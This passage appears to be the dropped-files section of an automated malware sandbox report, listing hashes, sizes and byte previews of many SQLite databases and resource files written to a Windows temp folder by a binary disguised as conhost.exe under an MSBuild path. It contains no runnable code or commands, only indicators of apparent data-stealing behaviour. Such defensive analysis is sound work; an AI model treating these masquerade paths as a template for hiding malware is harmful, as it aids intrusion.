                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\PIPGFiJ8oE

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5707520969659783
                                                          Encrypted:false
                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\PzBISDI1Z2

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\QAJjLADhO2

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\QXVXjZD2zC

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\QfcqH8pF1l

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.6732424250451717
                                                          Encrypted:false
                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\RESB3CA.tmp

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6cc, 10 symbols, created Tue Oct 1 05:21:33 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1924
                                                          Entropy (8bit):4.59920874720824
                                                          Encrypted:false
                                                          SSDEEP:24:HLm9nLzPj694VaHKwKtYN6lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+ScN:ALzPW94IBK6klmuulB+hnqXSfbNtmhn
                                                          MD5:FB9B8CF190BB815E840559131B741841
                                                          SHA1:C10A6C2E4C9442B3D950590756E0AA6F35AF37E8
                                                          SHA-256:6B45937452D4A51EFD5A4CF7D8E3218A5D4B34F448F6017A06DD00DCF25E8BAB
                                                          SHA-512:A53152115D6D0BC10944A14F1CF032D16151521553ED0FFF5A149946761C85F08EDA8977E3A5D99A0520823D6FA2318E65E7A2524A7C6C1DBAAD2384A6BA58C8
                                                          Malicious:false
                                                          Preview:L.....f.............debug$S........T...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........Y....c:\Program Files (x86)\Microsoft\Edge\Application\CSC35F53CF7FFB422D917B12E88668AC1.TMP......................q.QK.......N..........7.......C:\Users\user\AppData\Local\Temp\RESB3CA.tmp.-.<....................a..Microsoft (R) CVTRES.W.=..cwd.C:\blockhostnet.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.

                                                          C:\Users\user\AppData\Local\Temp\RESB531.tmp

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e4, 10 symbols, created Tue Oct 1 05:21:33 2024, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1948
                                                          Entropy (8bit):4.550615418579209
                                                          Encrypted:false
                                                          SSDEEP:24:HDG9E1XOXMaHowKtYNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+YEgUZ:MXJXK6MluOulajfqXSfbNtmhY2Z
                                                          MD5:7EBF6F3CE1CAF34F4ACC3B3C210F8817
                                                          SHA1:D95A81EE60A796A6ECD5C8EF80397CAB9A00B1E0
                                                          SHA-256:22C88F78C1B91787652F6E5EA69BC9157D0123F54AA6AECC92FD9D37D140BBBF
                                                          SHA-512:2529047428C5F5F8698C6B094C78D5A445ED311C3F4DC8F5DD4DE5AC7F10EBB44C257A51E51549B51F3AC61F4B29DC873036E8AA11A362A259E6FAAF32739D94
                                                          Malicious:false
                                                          Preview:L.....f.............debug$S........4...................@..B.rsrc$01................`...........@..@.rsrc$02........p...t...............@..@........<....c:\Windows\System32\CSCEBFD873D95F4D378C8CAFD01222E4F7.TMP..................r.av..t.y..............7.......C:\Users\user\AppData\Local\Temp\RESB531.tmp.-.<....................a..Microsoft (R) CVTRES.W.=..cwd.C:\blockhostnet.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.

                                                          C:\Users\user\AppData\Local\Temp\RaPgmKAOR9

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\RoMifF7wY4

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\SD2KZXiywA

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\SFE7n9qKqI

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\SaT7d6HNAy

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\Sq75iLEnrZ

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\T2KOcy4LfE

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.136471148832945
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\TEE1N6jNBN

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.5712781801655107
                                                          Encrypted:false
                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\TK1GnnCPbs

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\TY8wXaUeS2

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):40960
                                                          Entropy (8bit):0.8553638852307782
                                                          Encrypted:false
                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\TtvA5qNwDZ

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):0.8508558324143882
                                                          Encrypted:false
                                                          SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                          MD5:933D6D14518371B212F36C3835794D75
                                                          SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                          SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                          SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\U2DUjEdNDl

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\U787fSRxaR

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\UUrWWPwHOt

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1239949490932863
                                                          Encrypted:false
                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                          MD5:271D5F995996735B01672CF227C81C17
                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\UjjiqG5BgE

                                                          Download File
                                                          Process:C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):51200
                                                          Entropy (8bit):0.8745947603342119
                                                          Encrypted:false
                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
